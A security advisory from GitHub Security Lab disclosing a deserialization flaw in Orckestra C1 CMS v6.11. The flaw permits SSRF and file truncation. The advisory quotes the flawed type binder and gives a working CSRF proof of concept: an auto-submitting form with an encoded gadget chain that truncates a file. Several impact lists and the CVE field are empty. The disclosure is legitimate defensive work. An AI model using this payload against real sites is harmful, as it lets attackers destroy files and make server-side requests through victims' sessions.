Coordinated Disclosure Timeline

Summary

Deserialization of untrusted data allows for Server Side Request Forgery (SSRF) or arbitrary file truncation.

Product

Orckestra C1 CMS

Tested Version

v6.11

Details

Issue: Deserialization of untrusted data (GHSL-2022-001)

CompositeJsonSerializer.Deserialize is reachable from multiple endpoints where the serializedEntityToken is user controlled. The custom deserialization binder disallows creation of known remote code execution deserialization gadgets from third party libraries, but allows instantiation of any internal C1 class and classes from the standard library “mscorlib”, “System” and “System.Collections*” namespaces:

private void ValidateTypeIsSupported(string assemblyName, string typeName)
{
    assemblyName = new AssemblyName(assemblyName).Name;

    if (assemblyName == "Composite"
        || assemblyName.StartsWith("Composite.")
        || assemblyName.StartsWith("Orckestra."))
    {
        return;
    }

    if (assemblyName != typeof(object).Assembly.GetName().Name /* "mscorlib" */)
        throw new NotSupportedException($"Not supported assembly name '{assemblyName}'");

    var dotOffset = typeName.LastIndexOf(".", StringComparison.Ordinal);
    if (dotOffset > 0)
    {
        string ns = typeName.Substring(0, dotOffset);
        if (ns == nameof(System) || ns.StartsWith("System.Collections"))
        {
            return;
        }
    }

    throw new NotSupportedException("Not supported object type");
}

A determined attacker is able to construct a deserialization gadget chain that allows for:

To successfully exploit the vulnerability an attacker needs to be authenticated. However the following factors allow chaining the vulnerability with a successful Cross Site Request Forgery (CSRF) attack: 1) The /Composite/content/views/relationshipgraph/ is a GET endpoint. 2) Even if it was POST, there are no anti CSRF tokens in place. 3) The default value for SameSite cookie attribute is Lax in modern browsers. It means the site cookies are automatically attached on a cross site form GET request.

POC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:7913/Composite/content/views/relationshipgraph/default.aspx">
      <input type="hidden" name="EntityToken" value="&#123;&quot;&#36;type&quot;&#58;&quot;Composite&#46;C1Console&#46;Trees&#46;TreeFunctionElementGeneratorEntityToken&#44;&#32;Composite&quot;&#44;&quot;parentEntityToken&quot;&#58;&#123;&quot;&#36;type&quot;&#58;&quot;Composite&#46;C1Console&#46;Elements&#46;ElementProviderHelpers&#46;DataGroupingProviderHelper&#46;DataGroupingProviderHelperEntityToken&#44;&#32;Composite&quot;&#44;&quot;type&quot;&#58;&quot;a&quot;&#44;&quot;GroupingValues&quot;&#58;&#123;&quot;&#36;type&quot;&#58;&quot;System&#46;Collections&#46;Generic&#46;Dictionary&#96;2&#91;&#91;System&#46;String&#44;&#32;mscorlib&#93;&#44;&#91;System&#46;Object&#44;&#32;mscorlib&#93;&#93;&#44;&#32;mscorlib&quot;&#44;&quot;x&quot;&#58;&#123;&quot;&#36;type&quot;&#58;&quot;Composite&#46;C1Console&#46;Forms&#46;SchemaBuilder&#43;ElementInformationExtractor&#44;&#32;Composite&quot;&#44;&quot;configurationFilePath&quot;&#58;&quot;c&#58;&#47;temp&#47;test&#46;txt&quot;&#125;&#125;&#125;&#44;&quot;meta&#58;type&quot;&#58;&quot;Composite&#46;C1Console&#46;Trees&#46;TreeFunctionElementGeneratorEntityToken&quot;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

The vulnerability allows an authenticated user to:

The authenticated user may perform the actions unknowingly by visiting a specially crafted site.

CVE

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-001 in any communication regarding this issue.